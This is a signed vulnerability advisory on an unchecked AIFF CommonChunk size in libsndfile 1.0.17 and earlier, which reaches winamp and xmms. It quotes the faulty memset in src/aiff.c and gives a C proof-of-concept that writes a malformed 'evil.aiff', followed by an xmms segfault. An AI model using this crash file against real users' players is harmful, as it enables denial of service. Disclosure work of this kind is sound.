libsndfile AIFF buffer unverified

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

libsndfile AIFF buffer unverified

A security issue affects the following library/software releases

libsndfile <= 1.0.17
xmms-sndfile <= 1.2_4
winamp <=  5.541

And possibly more

- -BACKGROUND

Libsndfile is a C library for reading and writing files containing sampled
sound (such as MS Windows WAV and the Apple/SGI AIFF format) through one
standard library interface.

- -DESCRIPTION
 
Testing and debugging winamp, I have verified that the bug is specific to
the library libsndfile. I saw that some of the functions of reading gives
AIFF file headers, this does not check the limits of (CommonChunk.ckSize).
There may be other functions with the same problem. One of the errors
occur when unverified memset is called the limit of memory.

Quote segment code at src/aiff.c: 847
============================================================
      else if (comm_fmt->size >= SIZEOF_AIFC_COMM)
       {
 //Some lines omitted

 memset (psf-> u.scbuf, 0, comm_fmt-> size);
============================================================

- -CODE

============================================================
#include<stdio.h>
#include<stdlib.h>

#define AIFFSIZE 81
char *aiffbuff =
"\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4"
"\x00";

int main(void)  {
       FILE *aiff = fopen("evil.aiff","w+");
       fwrite(aiffbuff,AIFFSIZE,1,aiff);
       fclose(aiff);
}

============================================================

At the time that these applications process the file with invalid headers,
stop for an unexpected error, tcsh sample:

============================================================

Anon@localhost % xmms -v
xmms 1.2.11
Anon@localhost % xmms -p evil.aiff

Segmentation fault

You've probably found a bug in XMMS, please visit
http://bugs.xmms.org and fill out a bug report.

============================================================

- -IMPACT

Just a fun, but without using Denial of Service to any programs
that run the library.

Att.

Anon[at]elhacker.net


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (FreeBSD)

iQCVAwUBSZbcxT0RloP1tHX9AQIfTQP/aqqzwsVwQow4U4D1lzM0CYIVymjYmL7+
k1qmq4cypYyaSCYUt9KXBIh52hWYFtFfMlrYnREgbf+zDIgme6syUkU7EfE567ah
1tXhjJdYlC3CrKc6t2psUqyuhHBDU8YVyLyuTvTvWykQjVRKJUlfvNEeB97CVvHe
rrl8KwnEItk=
=FNmo
-----END PGP SIGNATURE-----